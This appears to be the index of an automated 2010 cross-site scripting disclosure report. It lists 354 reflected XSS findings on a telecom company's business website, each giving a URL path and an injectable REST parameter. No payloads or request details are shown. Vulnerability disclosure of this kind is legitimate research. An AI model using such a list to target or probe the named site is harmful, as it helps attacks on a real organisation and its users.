Hoyt LLC | Cross Site Scripting Report of 11-16-2010

Web Property: http://www.verizonbusiness.com

Report generated by Hoyt LLC at Tue Nov 16 19:08:13 CST 2010.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. Cross-site scripting (reflected)

1.1. http://www.verizonbusiness.com/Medium/ [REST URL parameter 1]

1.2. http://www.verizonbusiness.com/Medium/ [REST URL parameter 1]

1.3. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 1]

1.4. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 1]

1.5. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 2]

1.6. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 2]

1.7. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 1]

1.8. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 1]

1.9. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 2]

1.10. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 2]

1.11. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 3]

1.12. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 3]

1.13. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 4]

1.14. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 4]

1.15. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 5]

1.16. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 5]

1.17. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 1]

1.18. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 1]

1.19. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 2]

1.20. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 2]

1.21. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 1]

1.22. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 1]

1.23. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 2]

1.24. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 2]

1.25. http://www.verizonbusiness.com/Products/ [REST URL parameter 1]

1.26. http://www.verizonbusiness.com/Products/ [REST URL parameter 1]

1.27. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 1]

1.28. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 1]

1.29. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 2]

1.30. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 2]

1.31. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 1]

1.32. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 1]

1.33. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 2]

1.34. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 2]

1.35. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 3]

1.36. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 3]

1.37. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 1]

1.38. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 1]

1.39. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 2]

1.40. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 2]

1.41. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 3]

1.42. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 3]

1.43. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 1]

1.44. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 1]

1.45. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 2]

1.46. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 2]

1.47. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 3]

1.48. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 3]

1.49. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 1]

1.50. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 1]

1.51. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 2]

1.52. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 2]

1.53. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 3]

1.54. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 3]

1.55. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 1]

1.56. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 1]

1.57. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 2]

1.58. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 2]

1.59. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 3]

1.60. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 3]

1.61. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 1]

1.62. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 1]

1.63. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 2]

1.64. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 2]

1.65. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 3]

1.66. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 3]

1.67. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 1]

1.68. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 1]

1.69. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 2]

1.70. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 2]

1.71. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 3]

1.72. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 3]

1.73. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 1]

1.74. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 1]

1.75. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 2]

1.76. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 2]

1.77. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 3]

1.78. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 3]

1.79. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 1]

1.80. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 1]

1.81. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 2]

1.82. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 2]

1.83. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 1]

1.84. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 1]

1.85. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 2]

1.86. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 2]

1.87. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 3]

1.88. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 3]

1.89. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 1]

1.90. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 1]

1.91. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 2]

1.92. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 2]

1.93. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 3]

1.94. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 3]

1.95. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 4]

1.96. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 4]

1.97. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 1]

1.98. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 1]

1.99. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 2]

1.100. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 2]

1.101. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 3]

1.102. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 3]

1.103. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 4]

1.104. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 4]

1.105. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 5]

1.106. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 5]

1.107. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 1]

1.108. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 1]

1.109. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 2]

1.110. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 2]

1.111. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 3]

1.112. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 3]

1.113. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 4]

1.114. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 4]

1.115. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 1]

1.116. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 1]

1.117. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 2]

1.118. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 2]

1.119. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 3]

1.120. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 3]

1.121. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 1]

1.122. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 1]

1.123. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 2]

1.124. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 2]

1.125. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 3]

1.126. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 3]

1.127. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 1]

1.128. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 1]

1.129. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 2]

1.130. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 2]

1.131. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 3]

1.132. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 3]

1.133. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 4]

1.134. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 4]

1.135. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 1]

1.136. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 1]

1.137. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 2]

1.138. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 2]

1.139. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 3]

1.140. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 3]

1.141. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 4]

1.142. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 4]

1.143. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 1]

1.144. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 1]

1.145. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 2]

1.146. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 2]

1.147. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 3]

1.148. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 3]

1.149. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 1]

1.150. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 1]

1.151. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 2]

1.152. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 2]

1.153. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 3]

1.154. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 3]

1.155. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 1]

1.156. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 1]

1.157. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 2]

1.158. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 2]

1.159. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 1]

1.160. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 1]

1.161. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 2]

1.162. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 2]

1.163. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 3]

1.164. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 3]

1.165. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 1]

1.166. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 1]

1.167. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 2]

1.168. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 2]

1.169. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 3]

1.170. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 3]

1.171. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 1]

1.172. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 1]

1.173. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 2]

1.174. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 2]

1.175. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 3]

1.176. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 3]

1.177. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 1]

1.178. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 1]

1.179. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 2]

1.180. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 2]

1.181. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 3]

1.182. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 3]

1.183. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 1]

1.184. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 1]

1.185. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 2]

1.186. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 2]

1.187. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 3]

1.188. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 3]

1.189. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 4]

1.190. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 4]

1.191. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 1]

1.192. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 1]

1.193. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 2]

1.194. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 2]

1.195. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 3]

1.196. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 3]

1.197. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 1]

1.198. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 1]

1.199. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 2]

1.200. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 2]

1.201. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 3]

1.202. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 3]

1.203. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 1]

1.204. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 1]

1.205. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 2]

1.206. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 2]

1.207. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 3]

1.208. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 3]

1.209. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 1]

1.210. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 1]

1.211. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 2]

1.212. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 2]

1.213. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 3]

1.214. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 3]

1.215. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 1]

1.216. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 1]

1.217. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 2]

1.218. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 2]

1.219. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 3]

1.220. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 3]

1.221. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 1]

1.222. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 1]

1.223. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 2]

1.224. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 2]

1.225. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 1]

1.226. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 1]

1.227. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 2]

1.228. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 2]

1.229. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 3]

1.230. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 3]

1.231. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 1]

1.232. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 1]

1.233. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 2]

1.234. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 2]

1.235. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 3]

1.236. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 3]

1.237. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 1]

1.238. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 1]

1.239. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 2]

1.240. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 2]

1.241. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 3]

1.242. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 3]

1.243. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 1]

1.244. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 1]

1.245. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 2]

1.246. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 2]

1.247. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 3]

1.248. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 3]

1.249. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 1]

1.250. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 1]

1.251. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 2]

1.252. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 2]

1.253. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 3]

1.254. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 3]

1.255. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 1]

1.256. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 1]

1.257. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 2]

1.258. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 2]

1.259. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 3]

1.260. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 3]

1.261. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 1]

1.262. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 1]

1.263. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 2]

1.264. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 2]

1.265. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 3]

1.266. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 3]

1.267. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 1]

1.268. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 1]

1.269. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 2]

1.270. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 2]

1.271. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 1]

1.272. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 1]

1.273. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 2]

1.274. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 2]

1.275. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 3]

1.276. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 3]

1.277. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 1]

1.278. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 1]

1.279. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 2]

1.280. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 2]

1.281. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 3]

1.282. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 3]

1.283. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 1]

1.284. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 1]

1.285. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 2]

1.286. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 2]

1.287. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 3]

1.288. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 3]

1.289. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 1]

1.290. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 1]

1.291. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 2]

1.292. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 2]

1.293. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 3]

1.294. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 3]

1.295. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 1]

1.296. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 1]

1.297. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 2]

1.298. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 2]

1.299. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 3]

1.300. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 3]

1.301. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 1]

1.302. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 1]

1.303. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 2]

1.304. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 2]

1.305. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 3]

1.306. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 3]

1.307. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 1]

1.308. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 1]

1.309. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 2]

1.310. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 2]

1.311. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 3]

1.312. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 3]

1.313. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 1]

1.314. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 1]

1.315. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 2]

1.316. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 2]

1.317. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 3]

1.318. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 3]

1.319. http://www.verizonbusiness.com/about/ [REST URL parameter 1]

1.320. http://www.verizonbusiness.com/about/ [REST URL parameter 1]

1.321. http://www.verizonbusiness.com/about/company/ [REST URL parameter 1]

1.322. http://www.verizonbusiness.com/about/company/ [REST URL parameter 1]

1.323. http://www.verizonbusiness.com/about/company/ [REST URL parameter 2]

1.324. http://www.verizonbusiness.com/about/company/ [REST URL parameter 2]

1.325. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 1]

1.326. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 1]

1.327. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 2]

1.328. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 2]

1.329. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 3]

1.330. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 3]

1.331. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 1]

1.332. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 1]

1.333. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 2]

1.334. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 2]

1.335. http://www.verizonbusiness.com/about/events/ [REST URL parameter 1]

1.336. http://www.verizonbusiness.com/about/events/ [REST URL parameter 1]

1.337. http://www.verizonbusiness.com/about/events/ [REST URL parameter 2]

1.338. http://www.verizonbusiness.com/about/events/ [REST URL parameter 2]

1.339. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 1]

1.340. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 1]

1.341. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 2]

1.342. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 2]

1.343. http://www.verizonbusiness.com/about/network/ [REST URL parameter 1]

1.344. http://www.verizonbusiness.com/about/network/ [REST URL parameter 1]

1.345. http://www.verizonbusiness.com/about/network/ [REST URL parameter 2]

1.346. http://www.verizonbusiness.com/about/network/ [REST URL parameter 2]

1.347. http://www.verizonbusiness.com/about/news/ [REST URL parameter 1]

1.348. http://www.verizonbusiness.com/about/news/ [REST URL parameter 1]

1.349. http://www.verizonbusiness.com/about/news/ [REST URL parameter 2]

1.350. http://www.verizonbusiness.com/about/news/ [REST URL parameter 2]

1.351. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 1]

1.352. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 1]

1.353. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 2]

1.354. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 2]

